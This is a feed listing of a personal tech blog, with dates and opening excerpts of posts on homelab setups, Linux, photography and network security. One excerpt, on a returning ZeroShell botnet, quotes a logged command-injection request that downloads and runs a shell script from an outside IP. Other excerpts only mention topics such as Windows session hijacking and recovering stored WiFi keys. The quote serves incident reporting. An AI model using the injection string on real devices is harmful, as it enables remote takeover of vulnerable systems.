https://nbailey.ca/post/ Recent content in Posts on Noah Bailey Hugo -- gohugo.io en-CA Copyright (c) 2018-2024 Fri, 24 Nov 2023 15:55:00 -0500 https://nbailey.ca/post/exif/ Fri, 24 Nov 2023 15:55:00 -0500 https://nbailey.ca/post/exif/ A neat feature of almost every modern digital camera is that every single photo you take includes detailed metadata, including all of the photo’s settings including shutter speed, aperture, sensitivity, and focal length. The focal length, or simply the “zoomness” of your photo is of particular interest. All of the other settings are very easy to change by adjusting a dial (or using some annoying menus), but this one can only really be adjusted in a large way by changing lenses. https://nbailey.ca/post/raw/ Sat, 28 Oct 2023 13:30:06 -0400 https://nbailey.ca/post/raw/ Taking photos is fun and easy. Just kidding, it’s a fractal of complexity, FOMO, and slowly realizing how little you actually know. However, one nice thing is that using some simple Unix/Linux tools, it’s remarkably easy to mass produce good looking JPEG images from your raw photos, without having to actually learn Lightroom. After a few days of fiddling with the settings, I’ve come up with this bash script to process my images: https://nbailey.ca/post/iphone/ Fri, 04 Aug 2023 21:10:00 -0400 https://nbailey.ca/post/iphone/ This is my phone. It’s a 2016 iPhone SE, and for the past seven years, it has been my main computing device and the centre of my digital life. It’s outlived four laptops, three pairs of headphones, survived through dozens of trips away from home over three continents, a couple drops, and one close call with a broken umbrella in the fierce Ontario summer rain. It’s had two battery replacements, some lint picked out of the sleep button, and a few scratches on the screen from keys and grit. https://nbailey.ca/post/dont-make-it-work/ Wed, 05 Jul 2023 17:12:15 -0400 https://nbailey.ca/post/dont-make-it-work/ I’ve realized recently that I have to very carefully create boundaries around my hobbies to protect them. I like to take pictures. Sometimes of my cats, other times of neat things I see while traveling or exploring, and always to document things that I find interesting in the physical world. The encroachment of legitimacy It starts with a cheap sewing machine before spiraling into boxes of fabric, rare and vintage patterns, accessories and notions. https://nbailey.ca/post/nvr/ Sat, 07 Jan 2023 21:12:20 -0500 https://nbailey.ca/post/nvr/ While there are plenty of IOT security cameras that promise privacy, none of them really do. Eufy recently got busted for secretly accessing peoples' feeds, Unifi got breached, and literally every off-shore IOT device is slurping as much metadata (and regular data) off your devices as they possibly can. It’s not hard to understand a need for secure and private home security devices. Despite its age and legacy, ZoneMinder is still by far the most capable and complete solution for this. https://nbailey.ca/post/mastodon/ Mon, 28 Nov 2022 18:41:48 -0500 https://nbailey.ca/post/mastodon/ With Mastodon quickly becoming a refuge for former bird-site users fleeing the new regime, many are considering self-hosting their Fediverse instance. There’s many good reasons to do this, such as privacy, data ownership, or even maintaining consistent performance while larger communities struggle to on-board an influx of new users. But, as always, self-hosting means new responsibilities! In this case, to ensure that the data is safe and secure, operating correctly, and to ensure that the server is not disseminating malware. https://nbailey.ca/post/block-scanners/ Tue, 08 Nov 2022 21:35:22 -0500 https://nbailey.ca/post/block-scanners/ Anybody who runs an internet-facing webserver has seen their fair share of spammy scanners in the logs. It varies server to server, but some of mine get up to 15,000 scans per day. Almost all of these are harmless network mappers, but they still annoy me. Many are compromised hosts or belong to hackers & organized crime rings. While it’s possible to create false positives, it’s probably safe to block all of these. https://nbailey.ca/post/github-actions-ssh/ Sun, 18 Sep 2022 17:37:08 -0400 https://nbailey.ca/post/github-actions-ssh/ Several admins and developers like automatically updating their servers with new builds as they become available. Commonly known as “CI/CD”, this process allows teams to iterate much faster and speed up product development. Often, this is simply pulling from a repo and running a couple docker-compose commands, which is very easy to automate. A bad way to do this is using a cron job that runs every 10 minutes to pull from the repository and execute any commands. https://nbailey.ca/post/debian-zfs/ Sun, 24 Jul 2022 12:00:00 -0400 https://nbailey.ca/post/debian-zfs/ This guide is for an advanced Debian GNU/Linux installation using the ZFS storage system with an encrypted root volume for security and privacy. It will also be upgraded from the current Stable release (Bullseye) to the rolling-release Unstable version (Sid). ZFS has long been considered the last word on advanced storage developments. With its advanced safety, efficiency, and performance mechanisms it’s easy to see why it’s popular in the storage world, DIY and enterprise alike. https://nbailey.ca/post/redis-hack/ Sun, 22 May 2022 21:50:05 -0400 https://nbailey.ca/post/redis-hack/ If you’ve put Redis on the internet you’ve probably had your box hacked one way or another. Unfortunately, the service has very weak defaults with no authentication, encryption, or meaningful access control. While it’s true that redis is a back-end service that should only be used between servers, it’s often misused and abused. For example, there are about 40,000 redis instances indexed on shodan.io, about half of which are not in protected mode. https://nbailey.ca/post/debian-laptop/ Fri, 06 May 2022 17:06:34 -0400 https://nbailey.ca/post/debian-laptop/ Since late 2018, I had been a full-time Arch Linux user. At that time, it was worth it for me to spend the extra time dealing with Arch’s quirks, meticulously updating my AUR software, fiddling with all-manual configuration, and manually migrating any software between major versions whenever Pacman updated them. It was both a great learning experience, and… well… A bit of a waste of time ;) Needless to say, things have changed in my life since then, and I now place a much larger emphasis on ‘boring’ stuff. https://nbailey.ca/post/radiation-monitor/ Fri, 04 Feb 2022 18:13:52 -0500 https://nbailey.ca/post/radiation-monitor/ I have an odd fascination with radiation… Not to the point that I’m buying “Naturally Occurring Radioactive Materials” (or NORMs for short) on eBay, but certainly to the point that I own a digital geiger counter and regularly measure… things… Recently, I discovered https://radmon.org, a site where users can connect a counter to their API and send data to the network of scientists that study background radiation in real time. https://nbailey.ca/post/simple-alerts/ Sat, 18 Dec 2021 17:28:06 -0500 https://nbailey.ca/post/simple-alerts/ Log aggregation systems are fantastic. As are time-series metrics databases. But that’s not what this post is about. These methods aren’t a replacement for those systems at all, but a basic way to implement the core basics of monitoring and alerting. You see, the strength of a SIEM or log aggregation system is its numbers. It correlates data from hundreds or thousands of sources, giving very important insights about overall system usage patterns, login activity, audit trails, and more. https://nbailey.ca/post/nuc-crashes/ Mon, 13 Dec 2021 10:08:14 -0500 https://nbailey.ca/post/nuc-crashes/ I recently installed Debian Bullseye on an old Intel NUCCAY6H mini PC I had lying around. It’s a great little device for a home server, as it’s very cheap, fits 16G of memory, and with 4 mini-cores it’s no slouch. The first install attempt didn’t go well, with missing firmware for the NIC causing hanging for a couple minutes during boot. This happens quite a bit with Debian’s hard-line stance on binary blobs, so I re-installed with the non-free install media. https://nbailey.ca/post/make-your-things-less-dangerous/ Mon, 08 Nov 2021 18:30:38 -0500 https://nbailey.ca/post/make-your-things-less-dangerous/ There are lots of “very correct” ways to make your server “very secure.” Most of them rely on paid services, complicated agent-manager topologies, and cool buzzwords like “zero trust”. However, as they say, perfection is the enemy of progress. Many are discouraged by this absolutist approach to server safety, and forget the very basics. Obviously, the expensive and complex solutions exist for a reason, but at the same time a little goes a long way. https://nbailey.ca/post/win11-will-create-trash/ Sun, 27 Jun 2021 14:23:59 -0400 https://nbailey.ca/post/win11-will-create-trash/ The latest announcements for Windows 11 have revealed that the next version of the Windows operating system will have very stringent hardware requirements. Some of them are, in my opinion, quite reasonable. For example, they’re finally dropping support for 32 bit X86 and legacy BIOS boot. These make sense, because almost every PC manufactured since 2011 has supported X64 and UEFI. It also sheds a substantial amount of technical debt and cruft, and simplifies the system slightly. https://nbailey.ca/post/k8s-networking/ Fri, 30 Apr 2021 02:30:00 +0000 https://nbailey.ca/post/k8s-networking/ I have wanted to run Kubernetes at home for some time, but the main obstacle has been a reliable solution for providing load balancing for ingress or services, and the lack of a reasonable way to manage NAT transparently. While publicly routable IPv4 addresses are seemingly limitless* in the cloud, typically we only get one at home. Similarly, there isn’t a straightforward way to build cloud-ey load balancers at home. While Google and Amazon can conjure up magic TCP load balancers on their complex overlay network platform, we don’t really have that luxury outside of the cloud. https://nbailey.ca/post/cursed-certificate/ Mon, 05 Apr 2021 12:52:46 -0400 https://nbailey.ca/post/cursed-certificate/ This is the story of the most awful SSL certificate I have ever made. This was done entirely for my own amusement, and for the minute possibility that I could make somebody I don’t like miserable. Now, why on earth would I want to do this? Well, I don’t particularly respect scanner people. Their scanners are annoying, their tools always suck, and they create tonnes of noise in my logs that I don’t like. https://nbailey.ca/post/disposable-and-stupid/ Thu, 04 Mar 2021 17:37:17 -0500 https://nbailey.ca/post/disposable-and-stupid/ Across the street from my apartment is a house which has been in a perpetual state of renovation for nearly six months. This past week, a for sale sign has popped out of the ground just in time for the spring rush. It turns out, the man who bought the house did so about a year ago with the sole purpose of renovating and flipping it to make a quick buck. https://nbailey.ca/post/openbsd-as-a-linux-geek/ Wed, 03 Mar 2021 14:00:00 -0500 https://nbailey.ca/post/openbsd-as-a-linux-geek/ There’s always been a kind of temptation from the proverbial ‘other side of the fence’ when it comes to Unix-like operating systems. This idea that there’s an entirely separate and similar, but entirely distinct system from what I’m used to is exactly what’s pulled me towards OpenBSD today. As somebody experienced with almost every mainstream Linux distro, I wasn’t entirely sure what to expect. Visiting the website (openbsd.org), the first thing I noticed was how dense and concise the documentation was. https://nbailey.ca/post/rotary-phone-voip/ Sat, 09 Jan 2021 13:45:45 -0500 https://nbailey.ca/post/rotary-phone-voip/ One of the worst parts of modern life is how unsatisfying it is to hang up on somebody. Tapping on the ‘End Call’ button on an iPhone or angrily clicking ‘Leave Meeting’ on Zoom just isn’t nearly as fun as slamming down the handset on a real phone. This particular project was to breathe some life into the antique Northern Telecom phone from my grandparents' house by attaching it to a modern VoIP system. https://nbailey.ca/post/wan-speedtest-elasticsearch/ Wed, 09 Dec 2020 21:36:57 -0500 https://nbailey.ca/post/wan-speedtest-elasticsearch/ Similar to another post about WAN latency, this is a simple system to automate periodic internet speed tests. The two main components are speedtest-cli and ElasticSearch. These were chosen because I already had both set up and running, along with all the visualization and analytical software. To get a basic POC set up, just install ElasticSearch and Kibana with Docker. Once the node/cluster is running, the ‘speedtest client’ server can be set up. https://nbailey.ca/post/wan-ping-monitor-influxdb/ Mon, 07 Dec 2020 19:38:21 -0500 https://nbailey.ca/post/wan-ping-monitor-influxdb/ This is a simple, ‘quick and dirty’ way to measure network latency over long periods of time. The only ‘complicated’ part is setting up InfluxDB, but I imagine that many folks already have it set up. To get started, check the official documentation. Network latency will be measured with the good old ping command, then formatted with generic Unix tools. Then, statistics are stored using the influxdb write endpoint using the line protocol format. https://nbailey.ca/post/zeroshell-returns/ Wed, 02 Dec 2020 17:53:33 -0500 https://nbailey.ca/post/zeroshell-returns/ Back in August, I discovered novel cyberattacks targeting network infrastructure. Now, four months later, another botnet is targeting these devices again. My original report is here: https://nbailey.ca/post/zeroshell-botnet New attack The previous version of the zeroshell malware would leave logs with this pattern: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F99.99.99.99%2Fzero;sh%20zero;%22 Decoding the URL strings, we get: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://99.99.99.99/zero;sh zero;" This string causes the vulnerable system to download and execute a shell script named zero. However, the new attack takes on a different form: https://nbailey.ca/post/thinkpad-t60-gentoo/ Thu, 12 Nov 2020 19:17:43 -0500 https://nbailey.ca/post/thinkpad-t60-gentoo/ I installed Gentoo Linux on my vintage Thinkpad. This particular device has a rather colourful history. In mid 2015 I recovered it from an e-waste pile at my workplace and brought it back to life. In the years since, it’s been a playground of sorts. In five years it’s had four editions of Windows, three versions of BSD, exotic operating systems like Redox and ReactOS, and of course dozens of different Linux distributions. https://nbailey.ca/post/2020-10-malware-emails/ Fri, 23 Oct 2020 16:15:01 -0400 https://nbailey.ca/post/2020-10-malware-emails/ Today I got yet another malware email. They just won’t leave me alone. I suspect it has to do with the upcoming US election, based on all the CISA alerts I’ve seen over the last couple days. However, after going down the rabbit hole with this malware I do suspect that whatever is behind it is more sophisticated than a simple ransomware gang. I won’t speculate too much, but because of its highly distributed and evasive design it could be the work of a larger enterprise. https://nbailey.ca/post/tplink-device-weirdness/ Thu, 22 Oct 2020 18:19:05 -0400 https://nbailey.ca/post/tplink-device-weirdness/ I recently started using a TP-Link C7 router to host a guest network at my house. I typically avoid consumer/prosumer gear for my network, sticking to either whitebox (homemade) or older enterprise gear. Alas, the price was right ($0). Every time I do encounter one of these devices I always manage to find something fun and interesting to poke… Bad SSH server First red flag was the sshd server running on this router. https://nbailey.ca/post/elasticsearch-broke-all-my-nice-things/ Wed, 02 Sep 2020 17:22:20 -0400 https://nbailey.ca/post/elasticsearch-broke-all-my-nice-things/ About two weeks ago, I upgraded my single node ElasticSearch cluster from 6.8.6 to the latest 7.9 version. Last night, all hell broke loose… The upgrade itself wasn’t perfect. There were some issues with my setup that the helpful “Upgrade Assistant” didn’t pick up before I had already committed. I was missing a few formerly optional parameters in my elasticsearch.yml config file, there were some odd field mappings that weren’t supported any more, and some date format issues with my grok scripts. https://nbailey.ca/post/zeroshell-botnet/ Tue, 04 Aug 2020 13:30:50 -0400 https://nbailey.ca/post/zeroshell-botnet/ Starting a little less than two weeks ago, my IDS sensors have been detecting the spread of a new botnet. Unlike previous Mirai botnets, this appears to specifically target the GNU/Linux firewall distribution, “ZeroShell”. While it’s not especially dangerous as far as botnets are concerned, it does appear to be rather vigorous when it sends probes. However, we got lucky this time. Just as quickly it appeared, the C&C server went offline stopping the spread of this worm dead in its tracks. https://nbailey.ca/post/malware-on-the-wire/ Fri, 19 Jun 2020 23:15:04 -0400 https://nbailey.ca/post/malware-on-the-wire/ In my endless quest to essentially create a Cisco Firepower firewall for poor people, I found a bit of a gap in the open source security ecosystem. While we have great tools for detecting malicious network traffic patterns, we don’t have easy ways of detecting malicious files in transit. So, a bit of fiddling around later, and I have a fairly basic system for integrating Suricata’s ‘filestore’ functionality with ClamAV’s real time scanning, thereby producing a log containing the source and destination addresses of any malicious files detected. https://nbailey.ca/post/security-monitoring-ossec-suricata/ Tue, 19 May 2020 22:00:00 -0400 https://nbailey.ca/post/security-monitoring-ossec-suricata/ The idea of this setup is to protect the Small Systems as well as we protect the Big Systems. This solution uses a proven stack to protect webservers from modern threats. Using OSSEC, Suricata, and the built-in firewall capabilities of a modern Linux system it is possible to build a low maintenance and stable threat protection platform with relatively low performance impacts. It’s been specifically designed to be simple. The idea is that it will keep you on a ‘need to know basis’ and otherwise stay quiet and do it’s job. https://nbailey.ca/post/malware-emails-from-jerks/ Thu, 09 Apr 2020 20:31:37 -0400 https://nbailey.ca/post/malware-emails-from-jerks/ Today, I got an email inquiring about a job opportunity. This was immediately pretty funny, since I don’t employ anybody including myself. Even better, the guy sent a Microsoft Excel file as the ‘resume’, so even if I was hiring… Sorry bud, not going to be you. Now normally I just delete these documents and report spam. But seeing as how I’m locked into my house and have nothing better to do right now, I figured I might as well have some fun with this. https://nbailey.ca/post/wikipedia-mirror-server/ Thu, 26 Mar 2020 20:22:04 -0400 https://nbailey.ca/post/wikipedia-mirror-server/ For many years we’ve taken for granted the ability to settle any argument with Wikipedia. For so long, we’ve been able to settle any trivial dispute with a simple text search. That could change. I’m not really trying to fear-monger, but it’s always possible that the internet might go out and stay out. And like hell I’m going to sit in quarantine with my partner and not be able to settle up with Wikipedia! https://nbailey.ca/post/being-attacked-by-bots/ Tue, 18 Feb 2020 17:37:11 -0500 https://nbailey.ca/post/being-attacked-by-bots/ On the 19th of January 2020, a malicious actor launched an attack against my home infrastructure. At 42 minutes after midnight a device located in Buenos Aires, Argentina began attacking my proxy server. For the next six minutes, approximately 150 malicious HTTP requests were made. Fortunately, every single one of these requests was met with a HTTP/400 response, that’s because I don’t use Apache Struts 2 which this bot was attempting to exploit. https://nbailey.ca/post/linux-firewall-ids/ Fri, 14 Feb 2020 00:46:40 -0500 https://nbailey.ca/post/linux-firewall-ids/ Over the years, I’ve chewed through quite a few different routers, firewalls, even virtual appliances to connect my home network to the internet. Though most of these provided positive experiences, all of them had at least one point of friction, sometimes to the point of being a dealbreaker. PFSense is a great platform, but has terrible ethics. Sophos is proprietary and has an awful CLI. Untangle feels more like an ad than a product. https://nbailey.ca/post/you-probably-dont-need-a-vpn/ Wed, 15 Jan 2020 20:56:55 -0500 https://nbailey.ca/post/you-probably-dont-need-a-vpn/ Do you live in North Korea or Iran? Is your totalitarian government cracking down on dissidents? These are serious concerns for some, but for the rest of us it might be time to re-think the modern threat model. Why to people use VPN services? I think at the very core of the VPN subscription market is the belief that as a consumer it’s possible to buy privacy. That’s simply wrong. Privacy is a process, not a product. https://nbailey.ca/post/oversharded-elasaticsearch/ Fri, 25 Oct 2019 19:23:16 -0400 https://nbailey.ca/post/oversharded-elasaticsearch/ TL;DR The default settings for Logstash index rotation are bad and will break your cluster after a few months unless you change the rotation strategy. If you’re anything like me, you probably read somebody’s cool blog about how awesome ELK stack is and just had to have a piece of it. So you went through the quick start guide, googled your way through getting it up and running, then BAM you had an awesome logging system with all the bells and whistles! https://nbailey.ca/post/kvm-ansible-automation/ Sat, 28 Sep 2019 11:24:11 -0400 https://nbailey.ca/post/kvm-ansible-automation/ Think of it like, “OpenStack for cheapskates." There are plenty of ways to automate the provisioning of virtual machines, and while this isn’t the best way it certainly works great for me. I am fortunate enough to have a very heterogeneous environment at home; aside from a few appliances nearly all my virtual machines are running Ubuntu 18.04. This approach certainly won’t work for those who have a mixed environment with different versions Linux, Windows, and BSD derivatives. https://nbailey.ca/post/update-all-the-things/ Sat, 07 Sep 2019 22:17:55 -0400 https://nbailey.ca/post/update-all-the-things/ Do you ever just update everything? There’s a few times you might need to do this. For example, some nasty vulnerability comes along and ruins your week. Or maybe you just want to be super up to date because you have a strange compulsion to have the latest and greatest of everything. Ether way, here’s my solution: Use Ansible inventories to update all your servers I wrote this playbook as a simple way to ‘freshen up’ my homelab after months of neglect. https://nbailey.ca/post/clean-the-systemd-journal/ Tue, 09 Jul 2019 21:51:35 -0400 https://nbailey.ca/post/clean-the-systemd-journal/ With the move from sysvinit to systemd, there were lots of small but important changes to the Linux ecosystem. One of them was the move from traditional syslog daemons to Systemd Journald. Now I’m not going to say this is a good or bad thing, as it entirely depends on your old habits and new optimism. What it does mean is a move to a faster and more flexible system log format but at the cost of some added complexity. https://nbailey.ca/post/stop-putting-your-ssh-keys-on-github/ Thu, 04 Jul 2019 20:40:25 -0400 https://nbailey.ca/post/stop-putting-your-ssh-keys-on-github/ Hot take: Stop putting your ssh keys on GitHub!!! For that matter, stop putting your keys in any kind of repository. Seriously, your private keys are private for a reason. Okay, let’s back up a little here. This morning some articles made their rounds about Cisco distributing network device firmware with keys and certs embedded in them. Now that happens all the time (ugh) but in this particular case, they were the keys of presumably a Huawei employee. https://nbailey.ca/post/cephfs-kvm-virtual-san/ Mon, 04 Mar 2019 20:11:36 -0500 https://nbailey.ca/post/cephfs-kvm-virtual-san/ I have, for a long time, been fascinated and terrified by “Virtual SAN” solutions. The idea of combining storage and compute seems on the surface very attractive. It allows us to scale out our storage and compute together or separately in relatively small and affordable units, helping avoid the sticker shock of the upfront cost of storage systems. And as somebody especially prone to capex-phobia, that really is a great solution. https://nbailey.ca/post/stealing-windows-sessions/ Fri, 01 Feb 2019 19:50:15 -0500 https://nbailey.ca/post/stealing-windows-sessions/ Editor’s note (2021-01): This particular hacking method no longer works after 2019-11 windows update. I had this article on ice for a very long time and feel confident that it won’t be abused at this time. Preface I feel like I shouldn’t have to say this, but please use your powers for good and not evil. The methods I’ll reveal here have quite impressive post-exploit abilities for lateral movement. If you’re thinking about getting arrested for something dumb, please don’t bring up my website at your trial. https://nbailey.ca/post/peap-freeradius/ Mon, 17 Dec 2018 00:10:20 -0500 https://nbailey.ca/post/peap-freeradius/ I don’t like Microsoft NPS. That’s not to say that it’s a very convenient server role, which it absolutely is, or that it doesn’t have a place, which it sort of does. It’s just that it’s almost always, in my own opinion, a better idea to go with another option. So what’s wrong with using NPS? Requires a full windows license. Personally, I have an aversion to throwing away money, even if it’s somebody else’s money. https://nbailey.ca/post/wlan-passwords/ Wed, 12 Dec 2018 21:34:50 -0500 https://nbailey.ca/post/wlan-passwords/ Ever wanted pull up the password for a WiFi network your computer remembers but you don’t? If you’re anything like me, the computer remembers far more than I do. Luckily, Windows not only stores these keys in plaintext, but some of them can even be retrieved without administrator access! (Is that good? I think it is but something tells me it might not be…) And of course, let’s go one step further and make a neat little script to pull out all of these keys and present them in a convenient way. https://nbailey.ca/post/mdt-linux/ Thu, 04 Oct 2018 08:19:20 -0400 https://nbailey.ca/post/mdt-linux/ No, I would not like to say hello, Cortana. Nothing is as monotonous, boring, and brain-numbingly automatable as installing Windows, installing applications, joining a domain, and clicking all the right boxes in all the right places. And it’s even worse in the latest versions of Windows 10, where we’re greeted by the condescending robot voice of Halo’s deceptive antagonist artificial intelligence during the OOBE setup phase. I’ve taken a particular liking to MDT, Microsoft’s solution to the absolute eye-glazing snorefest of configuring a new workstation or server. https://nbailey.ca/post/hacking-msi/ Mon, 01 Oct 2018 19:56:30 -0400 https://nbailey.ca/post/hacking-msi/ Deploying MSI installers with group policy is super neat and super handy…. Most of the time. Sometimes, though, you need a bit more than just the default options when pushing out packages, and for those of us that don’t have a wheelbarrow full of money to burn on System Center there are two ways to do this: Use a GP Preference Item to distribute a configuration file to managed systems Create a transform set to apply to the MSI installer file While the first approach at first seems more straightforward, it does lead to the inevitable “GPO Spaghetti” once packages are added and removed. https://nbailey.ca/post/dinghy/ Tue, 18 Sep 2018 20:10:14 -0400 https://nbailey.ca/post/dinghy/ Preface: Don’t do this on prod gear. This is a bad idea! I’ve long been a fan of automated deployment. During the fourth semester technical project at Fanshawe, I had a wonderful domain tree with OUs and global groups, group policies and delegated permissions. It was truly a nice domain. It just…. Felt a little lonely. Enter PowerShell. Using a fairly simple script, I was able to cozy up the domains with the right users in the right places. https://nbailey.ca/post/netcode/ Tue, 18 Sep 2018 10:08:57 -0400 https://nbailey.ca/post/netcode/ Cisco IOS. It’s fun to configure, isn’t it? No? In an effort to learn Python scripting, I decided to take a bit of the monotony of managing and updating IOS config files away and replace it with the monotony of managing and updating spreadsheets! The real goal with this project was to design a ‘gitops’ system for periodically checking configs against baselines and build a stripped down orchestration platform. This turned out to be a little ambitious, but I’m fairly happy with the results regardless. https://nbailey.ca/post/homebrew/ Mon, 17 Sep 2018 15:40:16 -0400 https://nbailey.ca/post/homebrew/ Everybody and their aunt has a NAS at home, but what about something with a bit more pizzazz? How about if I build a system out of standard, off the shelf, ‘surplus sale’ gear and spin it into a really neat storage appliance? The Gear At Fanshawe College, the ‘Asset Sale’ is a proud tradition. IT students line up around the block to get good deals on retired and scratch-and-dent electronics. https://nbailey.ca/post/cloudy/ Sat, 15 Sep 2018 10:23:02 -0400 https://nbailey.ca/post/cloudy/ In 2018 I decided to stop worrying and embrace the cloud. Here’s how. Throughout the process, my focus was on low cost and simplicity, and I must say, this was a truly valuable experience. Getting a domain First stop was buying my domain. I opted to buy from Namecheap thanks to the student deals they have. Next stop was moving the domain somewhere better. Not to insult Namecheap, they’re a decent registrar.